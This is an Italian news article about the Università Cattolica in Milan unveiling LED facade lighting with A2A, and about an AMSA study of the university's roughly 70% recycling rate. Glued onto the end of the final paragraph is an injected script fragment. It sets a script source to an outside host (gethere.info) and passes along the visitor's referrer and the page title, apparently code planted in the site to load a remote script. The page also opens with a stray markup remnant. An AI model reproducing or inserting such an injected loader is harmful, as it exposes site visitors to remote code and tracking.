"/>
sabato 26 maggio 2018 14:30:09
omnimilano

Cattolica, facciata dell’Università si illumina a led: progetto con A2A

23 settembre 2016 Ambiente

Si accende di luce nuova la facciata della sede universitaria di Largo Gemelli. E’ stata infatti inaugurata dal Rettore dell’Università Cattolica, Franco Anelli, e dal Presidente di A2A, Giovanni Valotti, la nuova illuminazione a Led realizzata per il fronte dello storico edificio che ospita il complesso principale dell’Ateneo.
Gli ambiti di collaborazione tra Università Cattolica e A2A non si esauriscono nell’illuminazione della facciata dell’Ateneo. Nelle scorse settimane, infatti, AMSA, la società ambientale del gruppo A2A, ha condotto uno studio sul campo in collaborazione con i tecnici dell’Università: avvalendosi anche di campionamenti ed analisi qualitative e quantitative sui rifiuti raccolti nelle sedi milanesi dell’Ateneo, è stato valutato il grado di sostenibilità dell’organizzazione della raccolta differenziata. La raccolta differenziata delle cinque principali frazioni dei rifiuti urbani (carta, vetro, plastica e metalli, organico ed indifferenziato) è risultata ben strutturata, con punti di raccolta diversificati per tipologia di luoghi ed utenze. La percentuale di raccolta differenziata rilevata nelle sedi dell’Ateneo raggiunge circa il 70%, una percentuale non solo conforme agli obiettivi più impegnativi previsti dalle normative italiane ed europee, ma che supera largamente la media di Milano (54%) che pur si colloca a livelli di eccellenza mondiale, contendendo a Vienna la palma di metropoli più performante nella raccolta differenziata. Anche la qualità delle frazioni differenziate è ottima con una presenza trascurabile di materiali estranei.
Lo studio di AMSA si conclude con un programma di ulteriore miglioramento, basato su interventi logistici e un piano di comunicazione congiunta rivolto a studenti, docenti e personale dell’Ateneo. Attraverso questi azioni l’Università Cattolica punta a raggiungere nei prossimi anni una percentuale dell’80% per rappresentare sempre più un punto di riferimento anche nell’ambito delle buone pratiche ambientali per la città di Milano.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo